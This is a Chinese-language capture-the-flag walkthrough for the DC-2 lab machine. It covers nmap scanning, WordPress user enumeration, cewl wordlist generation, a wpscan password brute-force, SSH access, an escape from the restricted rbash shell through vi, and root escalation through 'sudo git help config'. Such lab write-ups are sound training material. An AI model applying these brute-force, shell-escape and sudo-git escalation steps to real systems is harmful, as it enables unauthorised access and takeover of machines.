目标是找到5个flag
需要得到root权限
kali和靶机都需要设置为NAT模式
nmap -sP 192.168.181.1/24
主机发现
nmap -p 1-65535 -A 192.168.181.136
端口扫描
访问一下http://192.168.181.136,发现URL栏写的不是靶机的ip,而是http://dc-2/,而很明显,DNS没有解析出来
在windows host文件添加 192.168.181.136 dc-2
将域名指向我们的ip
kali靶机中也要添加,后面有用(etc/hosts)
发现flag1,提示使用cewl,以及cms是wordpress
wpscan --url http://dc-2 -e u
建立用户字典dc2_users.txt
dirb http://dc-2
目录扫描
需要密码,使用cewl生成密码
cewl -w pass.txt http://dc-2
使用wpscan爆破
wpscan --url http://dc-2 -U dc2_users.txt -P pass.txt
parturient adipiscing
登陆之后到处找找,我的wordpress点不进去,不知道为啥,找的别人的图
告诉我们wordpress不能用了,换个切入点
我们上面还发现了ssh服务,试试ssh连接
compgen -c
#查看可以使用的指令
意思是要切换成jerry用户
rbash是Restricted Shell,即受限的shell,它与一般标准shell的区别在于会限制执行一些行为。
怎么做可以绕过shell限制?
vi
:set shell=/bin/sh
:shell
添加路径
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
提示git提权(前提是执行sudo -l 提示不需要密码可以使用git命令)
sudo git help config
#在末行命令模式输入
!/bin/bash 或 !'sh'
#完成提权